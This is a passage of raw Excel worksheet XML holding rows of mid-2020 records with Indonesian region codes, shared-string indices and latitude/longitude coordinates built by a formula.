      </c>
      <c r="V2263" s="5" t="s">
        <v>16466</v>
      </c>
      <c r="W2263" s="5">
        <v>-621824</v>
      </c>
      <c r="X2263" t="s">
        <v>20215</v>
      </c>
      <c r="Y2263" t="str">
        <f t="shared" si="35"/>
        <v>-6.21824,106.83116</v>
      </c>
    </row>
    <row r="2264" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2264">
        <v>196106</v>
      </c>
      <c r="B2264" s="1">
        <v>44037</v>
      </c>
      <c r="C2264" s="2">
        <v>7.013888888888889E-2</v>
      </c>
      <c r="D2264" t="s">
        <v>2648</v>
      </c>
      <c r="E2264" t="s">
        <v>23</v>
      </c>
      <c r="G2264" t="s">
        <v>7631</v>
      </c>
      <c r="H2264" t="s">
        <v>26</v>
      </c>
      <c r="J2264" t="s">
        <v>5986</v>
      </c>
      <c r="L2264" t="s">
        <v>7632</v>
      </c>
      <c r="M2264">
        <v>3174060002</v>
      </c>
      <c r="N2264">
        <v>3174060</v>
      </c>
      <c r="O2264">
        <v>3174</v>
      </c>
      <c r="P2264">
        <v>31</v>
      </c>
      <c r="Q2264" t="s">
        <v>1761</v>
      </c>
      <c r="R2264" t="s">
        <v>1762</v>
      </c>
      <c r="S2264" t="s">
        <v>32</v>
      </c>
      <c r="T2264" t="s">
        <v>33</v>
      </c>
      <c r="U2264" s="5">
        <v>10682037</v>
      </c>
      <c r="V2264" s="5" t="s">
        <v>16467</v>
      </c>
      <c r="W2264" s="5">
        <v>-615755</v>
      </c>
      <c r="X2264" t="s">
        <v>20216</v>
      </c>
      <c r="Y2264" t="str">
        <f t="shared" si="35"/>
        <v>-6.15755,106.82037</v>
      </c>
    </row>
    <row r="2265" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2265">
        <v>196107</v>
      </c>
      <c r="B2265" s="1">
        <v>44037</v>
      </c>
      <c r="C2265" s="2">
        <v>7.1527777777777787E-2</v>
      </c>
      <c r="D2265" t="s">
        <v>2648</v>
      </c>
      <c r="E2265" t="s">
        <v>23</v>
      </c>
      <c r="G2265" t="s">
        <v>7633</v>
      </c>
      <c r="H2265" t="s">
        <v>26</v>
      </c>
      <c r="J2265" t="s">
        <v>5986</v>
      </c>
      <c r="L2265" t="s">
        <v>7634</v>
      </c>
      <c r="M2265">
        <v>3174060002</v>
      </c>
      <c r="N2265">
        <v>3174060</v>
      </c>
      <c r="O2265">
        <v>3174</v>
      </c>
      <c r="P2265">
        <v>31</v>
      </c>
      <c r="Q2265" t="s">
        <v>1761</v>
      </c>
      <c r="R2265" t="s">
        <v>1762</v>
      </c>
      <c r="S2265" t="s">
        <v>32</v>
      </c>
      <c r="T2265" t="s">
        <v>33</v>
      </c>
      <c r="U2265" s="5">
        <v>10682015</v>
      </c>
      <c r="V2265" s="5" t="s">
        <v>16468</v>
      </c>
      <c r="W2265" s="5">
        <v>-615732</v>
      </c>
      <c r="X2265" t="s">
        <v>20217</v>
      </c>
      <c r="Y2265" t="str">
        <f t="shared" si="35"/>
        <v>-6.15732,106.82015</v>
      </c>
    </row>
    <row r="2266" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2266">
        <v>196124</v>
      </c>
      <c r="B2266" s="1">
        <v>44037</v>
      </c>
      <c r="C2266" s="2">
        <v>0.10202546296296296</v>
      </c>
      <c r="D2266" t="s">
        <v>22</v>
      </c>
      <c r="E2266" t="s">
        <v>23</v>
      </c>
      <c r="F2266" t="s">
        <v>7635</v>
      </c>
      <c r="G2266" t="s">
        <v>7636</v>
      </c>
      <c r="H2266" t="s">
        <v>26</v>
      </c>
      <c r="I2266" t="s">
        <v>1538</v>
      </c>
      <c r="J2266" t="s">
        <v>7637</v>
      </c>
      <c r="L2266" t="s">
        <v>7638</v>
      </c>
      <c r="M2266">
        <v>6201050007</v>
      </c>
      <c r="N2266">
        <v>6201050</v>
      </c>
      <c r="O2266">
        <v>6201</v>
      </c>
      <c r="P2266">
        <v>62</v>
      </c>
      <c r="Q2266" t="s">
        <v>7639</v>
      </c>
      <c r="R2266" t="s">
        <v>7640</v>
      </c>
      <c r="S2266" t="s">
        <v>7641</v>
      </c>
      <c r="T2266" t="s">
        <v>7642</v>
      </c>
      <c r="U2266" s="5">
        <v>11163208</v>
      </c>
      <c r="V2266" s="5" t="s">
        <v>16469</v>
      </c>
      <c r="W2266" s="5">
        <v>-267524</v>
      </c>
      <c r="X2266" t="s">
        <v>20218</v>
      </c>
      <c r="Y2266" t="str">
        <f t="shared" si="35"/>
        <v>-2.67524,111.63208</v>
      </c>
    </row>
    <row r="2267" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2267">
        <v>196164</v>
      </c>
      <c r="B2267" s="1">
        <v>44037</v>
      </c>
      <c r="C2267" s="2">
        <v>0.45555555555555555</v>
      </c>
      <c r="D2267" t="s">
        <v>22</v>
      </c>
      <c r="E2267" t="s">
        <v>23</v>
      </c>
      <c r="F2267" t="s">
        <v>7643</v>
      </c>
      <c r="H2267" t="s">
        <v>26</v>
      </c>
      <c r="I2267" t="s">
        <v>1136</v>
      </c>
      <c r="J2267" t="s">
        <v>1656</v>
      </c>
      <c r="L2267" t="s">
        <v>7644</v>
      </c>
      <c r="M2267">
        <v>3173080003</v>
      </c>
      <c r="N2267">
        <v>3173080</v>
      </c>
      <c r="O2267">
        <v>3173</v>
      </c>
      <c r="P2267">
        <v>31</v>
      </c>
      <c r="Q2267" t="s">
        <v>157</v>
      </c>
      <c r="R2267" t="s">
        <v>157</v>
      </c>
      <c r="S2267" t="s">
        <v>62</v>
      </c>
      <c r="T2267" t="s">
        <v>33</v>
      </c>
      <c r="U2267" s="5">
        <v>10682717</v>
      </c>
      <c r="V2267" s="5" t="s">
        <v>14477</v>
      </c>
      <c r="W2267" s="5">
        <v>-617539</v>
      </c>
      <c r="X2267" t="s">
        <v>19329</v>
      </c>
      <c r="Y2267" t="str">
        <f t="shared" si="35"/>
        <v>-6.17539,106.82717</v>
      </c>
    </row>
    <row r="2268" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2268">
        <v>196166</v>
      </c>
      <c r="B2268" s="1">
        <v>44037</v>
      </c>
      <c r="C2268" s="2">
        <v>0.51417824074074081</v>
      </c>
      <c r="D2268" t="s">
        <v>22</v>
      </c>
      <c r="E2268" t="s">
        <v>23</v>
      </c>
      <c r="F2268" t="s">
        <v>7645</v>
      </c>
      <c r="H2268" t="s">
        <v>26</v>
      </c>
      <c r="I2268" t="s">
        <v>7646</v>
      </c>
      <c r="J2268" t="s">
        <v>6626</v>
      </c>
      <c r="L2268" t="s">
        <v>7647</v>
      </c>
      <c r="M2268">
        <v>7318040019</v>
      </c>
      <c r="N2268">
        <v>7318040</v>
      </c>
      <c r="O2268">
        <v>7318</v>
      </c>
      <c r="P2268">
        <v>73</v>
      </c>
      <c r="Q2268" t="s">
        <v>7648</v>
      </c>
      <c r="R2268" t="s">
        <v>7649</v>
      </c>
      <c r="S2268" t="s">
        <v>7650</v>
      </c>
      <c r="T2268" t="s">
        <v>6630</v>
      </c>
      <c r="U2268" s="5">
        <v>11983737</v>
      </c>
      <c r="V2268" s="5" t="s">
        <v>16470</v>
      </c>
      <c r="W2268" s="5">
        <v>-308102</v>
      </c>
      <c r="X2268" t="s">
        <v>20219</v>
      </c>
      <c r="Y2268" t="str">
        <f t="shared" si="35"/>
        <v>-3.08102,119.83737</v>
      </c>
    </row>
    <row r="2269" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2269">
        <v>196167</v>
      </c>
      <c r="B2269" s="1">
        <v>44037</v>
      </c>
      <c r="C2269" s="2">
        <v>0.56290509259259258</v>
      </c>
      <c r="D2269" t="s">
        <v>22</v>
      </c>
      <c r="E2269" t="s">
        <v>23</v>
      </c>
      <c r="F2269" t="s">
        <v>7651</v>
      </c>
      <c r="H2269" t="s">
        <v>26</v>
      </c>
      <c r="I2269" t="s">
        <v>1046</v>
      </c>
      <c r="J2269" t="s">
        <v>7637</v>
      </c>
      <c r="L2269" t="s">
        <v>7652</v>
      </c>
      <c r="M2269">
        <v>6201040005</v>
      </c>
      <c r="N2269">
        <v>6201040</v>
      </c>
      <c r="O2269">
        <v>6201</v>
      </c>
      <c r="P2269">
        <v>62</v>
      </c>
      <c r="Q2269" t="s">
        <v>7653</v>
      </c>
      <c r="R2269" t="s">
        <v>7654</v>
      </c>
      <c r="S2269" t="s">
        <v>7641</v>
      </c>
      <c r="T2269" t="s">
        <v>7642</v>
      </c>
      <c r="U2269" s="5">
        <v>11150855</v>
      </c>
      <c r="V2269" s="5" t="s">
        <v>16471</v>
      </c>
      <c r="W2269" s="5">
        <v>-249873</v>
      </c>
      <c r="X2269" t="s">
        <v>20220</v>
      </c>
      <c r="Y2269" t="str">
        <f t="shared" si="35"/>
        <v>-2.49873,111.50855</v>
      </c>
    </row>
    <row r="2270" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2270">
        <v>196170</v>
      </c>
      <c r="B2270" s="1">
        <v>44038</v>
      </c>
      <c r="C2270" s="2">
        <v>0.93626157407407407</v>
      </c>
      <c r="D2270" t="s">
        <v>22</v>
      </c>
      <c r="E2270" t="s">
        <v>23</v>
      </c>
      <c r="F2270" t="s">
        <v>7655</v>
      </c>
      <c r="G2270" t="s">
        <v>7656</v>
      </c>
      <c r="H2270" t="s">
        <v>26</v>
      </c>
      <c r="I2270" t="s">
        <v>893</v>
      </c>
      <c r="J2270" t="s">
        <v>7171</v>
      </c>
      <c r="L2270" t="s">
        <v>7657</v>
      </c>
      <c r="M2270">
        <v>6471030003</v>
      </c>
      <c r="N2270">
        <v>6471030</v>
      </c>
      <c r="O2270">
        <v>6471</v>
      </c>
      <c r="P2270">
        <v>64</v>
      </c>
      <c r="Q2270" t="s">
        <v>5749</v>
      </c>
      <c r="R2270" t="s">
        <v>7658</v>
      </c>
      <c r="S2270" t="s">
        <v>1307</v>
      </c>
      <c r="T2270" t="s">
        <v>1308</v>
      </c>
      <c r="U2270" s="5">
        <v>11686111</v>
      </c>
      <c r="V2270" s="5" t="s">
        <v>16472</v>
      </c>
      <c r="W2270" s="5">
        <v>-122695</v>
      </c>
      <c r="X2270" t="s">
        <v>20221</v>
      </c>
      <c r="Y2270" t="str">
        <f t="shared" si="35"/>
        <v>-1.22695,116.86111</v>
      </c>
    </row>
    <row r="2271" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2271">
        <v>196171</v>
      </c>
      <c r="B2271" s="1">
        <v>44039</v>
      </c>
      <c r="C2271" s="2">
        <v>1.8113425925925925E-2</v>
      </c>
      <c r="D2271" t="s">
        <v>22</v>
      </c>
      <c r="E2271" t="s">
        <v>23</v>
      </c>
      <c r="F2271" t="s">
        <v>7659</v>
      </c>
      <c r="G2271" t="s">
        <v>7660</v>
      </c>
      <c r="H2271" t="s">
        <v>26</v>
      </c>
      <c r="I2271" t="s">
        <v>882</v>
      </c>
      <c r="J2271" t="s">
        <v>7171</v>
      </c>
      <c r="M2271">
        <v>6471010005</v>
      </c>
      <c r="N2271">
        <v>6471010</v>
      </c>
      <c r="O2271">
        <v>6471</v>
      </c>
      <c r="P2271">
        <v>64</v>
      </c>
      <c r="Q2271" t="s">
        <v>7661</v>
      </c>
      <c r="R2271" t="s">
        <v>1306</v>
      </c>
      <c r="S2271" t="s">
        <v>1307</v>
      </c>
      <c r="T2271" t="s">
        <v>1308</v>
      </c>
      <c r="U2271" s="5">
        <v>11686833</v>
      </c>
      <c r="V2271" s="5" t="s">
        <v>16473</v>
      </c>
      <c r="W2271" s="5">
        <v>-125633</v>
      </c>
      <c r="X2271" t="s">
        <v>20222</v>
      </c>
      <c r="Y2271" t="str">
        <f t="shared" si="35"/>
        <v>-1.25633,116.86833</v>
      </c>
    </row>
    <row r="2272" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2272">
        <v>196177</v>
      </c>
      <c r="B2272" s="1">
        <v>44040</v>
      </c>
      <c r="C2272" s="2">
        <v>0.24326388888888886</v>
      </c>
      <c r="D2272" t="s">
        <v>22</v>
      </c>
      <c r="E2272" t="s">
        <v>23</v>
      </c>
      <c r="F2272" t="s">
        <v>7662</v>
      </c>
      <c r="G2272" t="s">
        <v>7663</v>
      </c>
      <c r="H2272" t="s">
        <v>26</v>
      </c>
      <c r="I2272" t="s">
        <v>666</v>
      </c>
      <c r="J2272" t="s">
        <v>6940</v>
      </c>
      <c r="L2272" t="s">
        <v>7664</v>
      </c>
      <c r="M2272">
        <v>1103030001</v>
      </c>
      <c r="N2272">
        <v>1103030</v>
      </c>
      <c r="O2272">
        <v>1103</v>
      </c>
      <c r="P2272">
        <v>11</v>
      </c>
      <c r="Q2272" t="s">
        <v>7665</v>
      </c>
      <c r="R2272" t="s">
        <v>7666</v>
      </c>
      <c r="S2272" t="s">
        <v>7667</v>
      </c>
      <c r="T2272" t="s">
        <v>6945</v>
      </c>
      <c r="U2272" s="5">
        <v>9746920</v>
      </c>
      <c r="V2272" s="5" t="s">
        <v>16474</v>
      </c>
      <c r="W2272" s="5">
        <v>306717</v>
      </c>
      <c r="X2272" t="s">
        <v>20223</v>
      </c>
      <c r="Y2272" t="str">
        <f t="shared" si="35"/>
        <v>3.06717,97.46920</v>
      </c>
    </row>
    <row r="2273" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2273">
        <v>196181</v>
      </c>
      <c r="B2273" s="1">
        <v>44040</v>
      </c>
      <c r="C2273" s="2">
        <v>0.4069444444444445</v>
      </c>
      <c r="D2273" t="s">
        <v>2648</v>
      </c>
      <c r="E2273" t="s">
        <v>23</v>
      </c>
      <c r="G2273" t="s">
        <v>7668</v>
      </c>
      <c r="H2273" t="s">
        <v>26</v>
      </c>
      <c r="J2273" t="s">
        <v>5986</v>
      </c>
      <c r="L2273" t="s">
        <v>7669</v>
      </c>
      <c r="M2273">
        <v>3174060002</v>
      </c>
      <c r="N2273">
        <v>3174060</v>
      </c>
      <c r="O2273">
        <v>3174</v>
      </c>
      <c r="P2273">
        <v>31</v>
      </c>
      <c r="Q2273" t="s">
        <v>1761</v>
      </c>
      <c r="R2273" t="s">
        <v>1762</v>
      </c>
      <c r="S2273" t="s">
        <v>32</v>
      </c>
      <c r="T2273" t="s">
        <v>33</v>
      </c>
      <c r="U2273" s="5">
        <v>10681934</v>
      </c>
      <c r="V2273" s="5" t="s">
        <v>16475</v>
      </c>
      <c r="W2273" s="5">
        <v>-615779</v>
      </c>
      <c r="X2273" t="s">
        <v>20224</v>
      </c>
      <c r="Y2273" t="str">
        <f t="shared" si="35"/>
        <v>-6.15779,106.81934</v>
      </c>
    </row>
    <row r="2274" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2274">
        <v>196184</v>
      </c>
      <c r="B2274" s="1">
        <v>44042</v>
      </c>
      <c r="C2274" s="2">
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="D2274" t="s">
        <v>22</v>
      </c>
      <c r="E2274" t="s">
        <v>23</v>
      </c>
      <c r="F2274" t="s">
        <v>7670</v>
      </c>
      <c r="G2274" t="s">
        <v>7671</v>
      </c>
      <c r="H2274" t="s">
        <v>26</v>
      </c>
      <c r="I2274" t="s">
        <v>882</v>
      </c>
      <c r="J2274" t="s">
        <v>7436</v>
      </c>
      <c r="L2274" t="s">
        <v>7672</v>
      </c>
      <c r="M2274">
        <v>6172040001</v>
      </c>
      <c r="N2274">
        <v>6172040</v>
      </c>
      <c r="O2274">
        <v>6172</v>
      </c>
      <c r="P2274">
        <v>61</v>
      </c>
      <c r="Q2274" t="s">
        <v>7673</v>
      </c>
      <c r="R2274" t="s">
        <v>7674</v>
      </c>
      <c r="S2274" t="s">
        <v>7675</v>
      </c>
      <c r="T2274" t="s">
        <v>7441</v>
      </c>
      <c r="U2274" s="5">
        <v>10899195</v>
      </c>
      <c r="V2274" s="5" t="s">
        <v>16476</v>
      </c>
      <c r="W2274" s="5">
        <v>90582</v>
      </c>
      <c r="X2274" t="s">
        <v>14443</v>
      </c>
      <c r="Y2274" t="str">
        <f t="shared" si="35"/>
        <v>0.90582,108.99195</v>
      </c>
    </row>
    <row r="2275" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2275">
        <v>196188</v>
      </c>
      <c r="B2275" s="1">
        <v>44045</v>
      </c>
      <c r="C2275" s="2">
        <v>0.18908564814814813</v>
      </c>
      <c r="D2275" t="s">
        <v>22</v>
      </c>
      <c r="E2275" t="s">
        <v>23</v>
      </c>
      <c r="F2275" t="s">
        <v>7676</v>
      </c>
      <c r="G2275" t="s">
        <v>7677</v>
      </c>
      <c r="H2275" t="s">
        <v>26</v>
      </c>
      <c r="I2275" t="s">
        <v>7368</v>
      </c>
      <c r="J2275" t="s">
        <v>7678</v>
      </c>
      <c r="L2275" t="s">
        <v>7679</v>
      </c>
      <c r="M2275">
        <v>7202081005</v>
      </c>
      <c r="N2275">
        <v>7202081</v>
      </c>
      <c r="O2275">
        <v>7202</v>
      </c>
      <c r="P2275">
        <v>72</v>
      </c>
      <c r="Q2275" t="s">
        <v>7680</v>
      </c>
      <c r="R2275" t="s">
        <v>7681</v>
      </c>
      <c r="S2275" t="s">
        <v>7682</v>
      </c>
      <c r="T2275" t="s">
        <v>7683</v>
      </c>
      <c r="U2275" s="5">
        <v>12337203</v>
      </c>
      <c r="V2275" s="5" t="s">
        <v>16477</v>
      </c>
      <c r="W2275" s="5">
        <v>-93200</v>
      </c>
      <c r="X2275" t="s">
        <v>20225</v>
      </c>
      <c r="Y2275" t="str">
        <f t="shared" si="35"/>
        <v xml:space="preserve"> -0.93200,123.37203</v>
      </c>
    </row>
    <row r="2276" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2276">
        <v>196190</v>
      </c>
      <c r="B2276" s="1">
        <v>44047</v>
      </c>
      <c r="C2276" s="2">
        <v>9.6990740740740752E-2</v>
      </c>
      <c r="D2276" t="s">
        <v>22</v>
      </c>
      <c r="E2276" t="s">
        <v>23</v>
      </c>
      <c r="F2276" t="s">
        <v>7684</v>
      </c>
      <c r="G2276" t="s">
        <v>7685</v>
      </c>
      <c r="H2276" t="s">
        <v>26</v>
      </c>
      <c r="I2276" t="s">
        <v>137</v>
      </c>
      <c r="J2276" t="s">
        <v>7399</v>
      </c>
      <c r="L2276" t="s">
        <v>7686</v>
      </c>
      <c r="M2276">
        <v>1471011004</v>
      </c>
      <c r="N2276">
        <v>1471011</v>
      </c>
      <c r="O2276">
        <v>1471</v>
      </c>
      <c r="P2276">
        <v>14</v>
      </c>
      <c r="Q2276" t="s">
        <v>7687</v>
      </c>
      <c r="R2276" t="s">
        <v>7688</v>
      </c>
      <c r="S2276" t="s">
        <v>7403</v>
      </c>
      <c r="T2276" t="s">
        <v>7404</v>
      </c>
      <c r="U2276" s="5">
        <v>10141692</v>
      </c>
      <c r="V2276" s="5" t="s">
        <v>16478</v>
      </c>
      <c r="W2276" s="5">
        <v>52416</v>
      </c>
      <c r="X2276" t="s">
        <v>14444</v>
      </c>
      <c r="Y2276" t="str">
        <f t="shared" si="35"/>
        <v>0.52416,101.41692</v>
      </c>
    </row>
    <row r="2277" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2277">
        <v>196197</v>
      </c>
      <c r="B2277" s="1">
        <v>44048</v>
      </c>
      <c r="C2277" s="2">
        <v>0.98472222222222217</v>
      </c>
      <c r="D2277" t="s">
        <v>2648</v>
      </c>
      <c r="E2277" t="s">
        <v>23</v>
      </c>
      <c r="G2277" t="s">
        <v>7689</v>
      </c>
      <c r="H2277" t="s">
        <v>26</v>
      </c>
      <c r="J2277" t="s">
        <v>7690</v>
      </c>
      <c r="L2277" t="s">
        <v>7691</v>
      </c>
      <c r="M2277">
        <v>3174080001</v>
      </c>
      <c r="N2277">
        <v>3174080</v>
      </c>
      <c r="O2277">
        <v>3174</v>
      </c>
      <c r="P2277">
        <v>31</v>
      </c>
      <c r="Q2277" t="s">
        <v>694</v>
      </c>
      <c r="R2277" t="s">
        <v>695</v>
      </c>
      <c r="S2277" t="s">
        <v>32</v>
      </c>
      <c r="T2277" t="s">
        <v>33</v>
      </c>
      <c r="U2277" s="5">
        <v>10670054</v>
      </c>
      <c r="V2277" s="5" t="s">
        <v>16479</v>
      </c>
      <c r="W2277" s="5">
        <v>-616479</v>
      </c>
      <c r="X2277" t="s">
        <v>20226</v>
      </c>
      <c r="Y2277" t="str">
        <f t="shared" si="35"/>
        <v>-6.16479,106.70054</v>
      </c>
    </row>
    <row r="2278" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2278">
        <v>196258</v>
      </c>
      <c r="B2278" s="1">
        <v>44051</v>
      </c>
      <c r="C2278" s="2">
        <v>0.27777777777777779</v>
      </c>
      <c r="D2278" t="s">
        <v>2648</v>
      </c>
      <c r="E2278" t="s">
        <v>23</v>
      </c>
      <c r="G2278" t="s">
        <v>7692</v>
      </c>
      <c r="H2278" t="s">
        <v>26</v>
      </c>
      <c r="J2278" t="s">
        <v>387</v>
      </c>
      <c r="L2278" t="s">
        <v>7693</v>
      </c>
      <c r="M2278">
        <v>3174040007</v>
      </c>
      <c r="N2278">
        <v>3174040</v>
      </c>
      <c r="O2278">
        <v>3174</v>
      </c>
      <c r="P2278">
        <v>31</v>
      </c>
      <c r="Q2278" t="s">
        <v>389</v>
      </c>
      <c r="R2278" t="s">
        <v>377</v>
      </c>
      <c r="S2278" t="s">
        <v>32</v>
      </c>
      <c r="T2278" t="s">
        <v>33</v>
      </c>
      <c r="U2278" s="5">
        <v>10678175</v>
      </c>
      <c r="V2278" s="5" t="s">
        <v>14514</v>
      </c>
      <c r="W2278" s="5">
        <v>-615095</v>
      </c>
      <c r="X2278" t="s">
        <v>20227</v>
      </c>
      <c r="Y2278" t="str">
        <f t="shared" si="35"/>
        <v>-6.15095,106.78175</v>
      </c>
    </row>
    <row r="2279" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2279">
        <v>196273</v>
      </c>
      <c r="B2279" s="1">
        <v>44053</v>
      </c>
      <c r="C2279" s="2">
        <v>0.1567476851851852</v>
      </c>
      <c r="D2279" t="s">
        <v>22</v>
      </c>
      <c r="E2279" t="s">
        <v>23</v>
      </c>
      <c r="F2279" t="s">
        <v>7694</v>
      </c>
      <c r="G2279" t="s">
        <v>7695</v>
      </c>
      <c r="H2279" t="s">
        <v>26</v>
      </c>
      <c r="I2279" t="s">
        <v>197</v>
      </c>
      <c r="J2279" t="s">
        <v>7696</v>
      </c>
      <c r="L2279" t="s">
        <v>7697</v>
      </c>
      <c r="M2279">
        <v>3173020001</v>
      </c>
      <c r="N2279">
        <v>3173020</v>
      </c>
      <c r="O2279">
        <v>3173</v>
      </c>
      <c r="P2279">
        <v>31</v>
      </c>
      <c r="Q2279" t="s">
        <v>179</v>
      </c>
      <c r="R2279" t="s">
        <v>179</v>
      </c>
      <c r="S2279" t="s">
        <v>62</v>
      </c>
      <c r="T2279" t="s">
        <v>33</v>
      </c>
      <c r="U2279" s="5">
        <v>10684582</v>
      </c>
      <c r="V2279" s="5" t="s">
        <v>16480</v>
      </c>
      <c r="W2279" s="5">
        <v>-620827</v>
      </c>
      <c r="X2279" t="s">
        <v>20228</v>
      </c>
      <c r="Y2279" t="str">
        <f t="shared" si="35"/>
        <v>-6.20827,106.84582</v>
      </c>
    </row>
    <row r="2280" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2280">
        <v>196276</v>
      </c>
      <c r="B2280" s="1">
        <v>44054</v>
      </c>
      <c r="C2280" s="2">
        <v>0.35069444444444442</v>
      </c>
      <c r="D2280" t="s">
        <v>2648</v>
      </c>
      <c r="E2280" t="s">
        <v>23</v>
      </c>
      <c r="G2280" t="s">
        <v>7698</v>
      </c>
      <c r="H2280" t="s">
        <v>26</v>
      </c>
      <c r="J2280" t="s">
        <v>2912</v>
      </c>
      <c r="L2280" t="s">
        <v>7699</v>
      </c>
      <c r="M2280">
        <v>3172040001</v>
      </c>
      <c r="N2280">
        <v>3172040</v>
      </c>
      <c r="O2280">
        <v>3172</v>
      </c>
      <c r="P2280">
        <v>31</v>
      </c>
      <c r="Q2280" t="s">
        <v>2914</v>
      </c>
      <c r="R2280" t="s">
        <v>281</v>
      </c>
      <c r="S2280" t="s">
        <v>49</v>
      </c>
      <c r="T2280" t="s">
        <v>33</v>
      </c>
      <c r="U2280" s="5">
        <v>10688679</v>
      </c>
      <c r="V2280" s="5" t="s">
        <v>16481</v>
      </c>
      <c r="W2280" s="5">
        <v>-629097</v>
      </c>
      <c r="X2280" t="s">
        <v>20229</v>
      </c>
      <c r="Y2280" t="str">
        <f t="shared" si="35"/>
        <v>-6.29097,106.88679</v>
      </c>
    </row>
    <row r="2281" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2281">
        <v>196407</v>
      </c>
      <c r="B2281" s="1">
        <v>44054</v>
      </c>
      <c r="C2281" s="2">
        <v>0.79999999999999993</v>
      </c>
      <c r="D2281" t="s">
        <v>22</v>
      </c>
      <c r="E2281" t="s">
        <v>23</v>
      </c>
      <c r="F2281" t="s">
        <v>7700</v>
      </c>
      <c r="G2281" t="s">
        <v>7701</v>
      </c>
      <c r="H2281" t="s">
        <v>26</v>
      </c>
      <c r="I2281" t="s">
        <v>1359</v>
      </c>
      <c r="J2281" t="s">
        <v>6038</v>
      </c>
      <c r="L2281" t="s">
        <v>250</v>
      </c>
      <c r="M2281">
        <v>1275050005</v>
      </c>
      <c r="N2281">
        <v>1275050</v>
      </c>
      <c r="O2281">
        <v>1275</v>
      </c>
      <c r="P2281">
        <v>12</v>
      </c>
      <c r="Q2281" t="s">
        <v>7702</v>
      </c>
      <c r="R2281" t="s">
        <v>7703</v>
      </c>
      <c r="S2281" t="s">
        <v>7704</v>
      </c>
      <c r="T2281" t="s">
        <v>6043</v>
      </c>
      <c r="U2281" s="5">
        <v>9870285</v>
      </c>
      <c r="V2281" s="5" t="s">
        <v>16482</v>
      </c>
      <c r="W2281" s="5">
        <v>357345</v>
      </c>
      <c r="X2281" t="s">
        <v>20230</v>
      </c>
      <c r="Y2281" t="str">
        <f t="shared" si="35"/>
        <v>3.57345,98.70285</v>
      </c>
    </row>
    <row r="2282" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2282">
        <v>196444</v>
      </c>
      <c r="B2282" s="1">
        <v>44054</v>
      </c>
      <c r="C2282" s="2">
        <v>0.92730324074074078</v>
      </c>
      <c r="D2282" t="s">
        <v>22</v>
      </c>
      <c r="E2282" t="s">
        <v>23</v>
      </c>
      <c r="F2282" t="s">
        <v>7705</v>
      </c>
      <c r="H2282" t="s">
        <v>26</v>
      </c>
      <c r="I2282" t="s">
        <v>72</v>
      </c>
      <c r="J2282" t="s">
        <v>6038</v>
      </c>
      <c r="L2282" t="s">
        <v>7706</v>
      </c>
      <c r="M2282">
        <v>1275060005</v>
      </c>
      <c r="N2282">
        <v>1275060</v>
      </c>
      <c r="O2282">
        <v>1275</v>
      </c>
      <c r="P2282">
        <v>12</v>
      </c>
      <c r="Q2282" t="s">
        <v>7707</v>
      </c>
      <c r="R2282" t="s">
        <v>7708</v>
      </c>
      <c r="S2282" t="s">
        <v>7704</v>
      </c>
      <c r="T2282" t="s">
        <v>6043</v>
      </c>
      <c r="U2282" s="5">
        <v>9869365</v>
      </c>
      <c r="V2282" s="5" t="s">
        <v>16483</v>
      </c>
      <c r="W2282" s="5">
        <v>356616</v>
      </c>
      <c r="X2282" t="s">
        <v>20231</v>
      </c>
      <c r="Y2282" t="str">
        <f t="shared" si="35"/>
        <v>3.56616,98.69365</v>
      </c>
    </row>
    <row r="2283" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2283">
        <v>196717</v>
      </c>
      <c r="B2283" s="1">
        <v>44056</v>
      </c>
      <c r="C2283" s="2">
        <v>0.19097222222222221</v>
      </c>
      <c r="D2283" t="s">
        <v>2648</v>
      </c>
      <c r="E2283" t="s">
        <v>23</v>
      </c>
      <c r="G2283" t="s">
        <v>7709</v>
      </c>
      <c r="H2283" t="s">
        <v>26</v>
      </c>
      <c r="J2283" t="s">
        <v>7710</v>
      </c>
      <c r="L2283" t="s">
        <v>7711</v>
      </c>
      <c r="Y2283" t="str">
        <f t="shared" si="35"/>
        <v>,</v>
      </c>
    </row>
    <row r="2284" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2284">
        <v>196765</v>
      </c>
      <c r="B2284" s="1">
        <v>44056</v>
      </c>
      <c r="C2284" s="2">
        <v>0.36736111111111108</v>
      </c>
      <c r="D2284" t="s">
        <v>2648</v>
      </c>
      <c r="E2284" t="s">
        <v>23</v>
      </c>
      <c r="G2284" t="s">
        <v>7712</v>
      </c>
      <c r="H2284" t="s">
        <v>26</v>
      </c>
      <c r="J2284" t="s">
        <v>7713</v>
      </c>
      <c r="L2284" t="s">
        <v>2794</v>
      </c>
      <c r="M2284">
        <v>3174050010</v>
      </c>
      <c r="N2284">
        <v>3174050</v>
      </c>
      <c r="O2284">
        <v>3174</v>
      </c>
      <c r="P2284">
        <v>31</v>
      </c>
      <c r="Q2284" t="s">
        <v>7466</v>
      </c>
      <c r="R2284" t="s">
        <v>2826</v>
      </c>
      <c r="S2284" t="s">
        <v>32</v>
      </c>
      <c r="T2284" t="s">
        <v>33</v>
      </c>
      <c r="U2284" s="5">
        <v>10681162</v>
      </c>
      <c r="V2284" s="5" t="s">
        <v>16484</v>
      </c>
      <c r="W2284" s="5">
        <v>-613685</v>
      </c>
      <c r="X2284" t="s">
        <v>20232</v>
      </c>
      <c r="Y2284" t="str">
        <f t="shared" si="35"/>
        <v>-6.13685,106.81162</v>
      </c>
    </row>
    <row r="2285" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2285">
        <v>196771</v>
      </c>
      <c r="B2285" s="1">
        <v>44056</v>
      </c>
      <c r="C2285" s="2">
